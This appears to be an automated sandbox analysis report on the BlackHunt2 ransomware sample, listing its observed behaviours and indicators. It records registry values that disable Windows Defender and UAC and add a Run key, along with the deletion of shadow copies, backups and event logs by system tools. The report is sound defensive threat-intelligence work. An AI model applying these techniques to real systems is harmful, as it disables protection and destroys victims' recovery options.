Malware Analysis Report

2025-06-16 00:03

Sample ID 241106-ba9wkssbpb
Target BlackHunt2.exe
SHA256 ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9
Tags
defense_evasion discovery evasion execution impact persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9

Threat Level: Known bad

The file BlackHunt2.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware trojan

Modifies Windows Defender Real-time Protection settings

UAC bypass

Deletes NTFS Change Journal

Clears Windows event logs

Modifies boot configuration data using bcdedit

Renames multiple (3392) files with added filename extension

Deletes shadow copies

Renames multiple (2874) files with added filename extension

Disables Task Manager via registry modification

Deletes backup catalog

Disables use of System Restore points

Deletes itself

Checks computer location settings

Adds Run key to start application

Checks whether UAC is enabled

Enumerates connected drives

Looks up external IP address via web service

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Runs ping.exe

Modifies registry class

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious behavior: GetForegroundWindowSpam

System policy modification

Kills process with taskkill

Suspicious behavior: CmdExeWriteProcessMemorySpam

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-06 00:57

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 00:57

Reported

2024-11-06 01:00

Platform

win7-20241023-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (2874) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\it.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\Common.fxh C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\pl\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lo\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\am_ET\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\PreviousMenuButtonIcon.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2976 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2976 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2976 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2956 wrote to memory of 2804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2956 wrote to memory of 2804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2956 wrote to memory of 2804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2696 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2696 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2696 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2840 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
